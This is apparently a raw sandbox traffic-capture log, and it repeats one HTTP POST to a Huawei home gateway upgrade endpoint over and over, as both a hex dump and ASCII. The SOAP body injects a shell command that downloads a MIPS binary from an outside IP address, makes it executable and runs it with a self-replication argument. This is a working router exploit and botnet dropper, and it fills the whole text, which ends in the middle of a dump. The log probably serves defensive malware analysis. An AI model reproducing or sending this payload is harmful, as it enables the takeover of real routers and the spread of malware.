74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 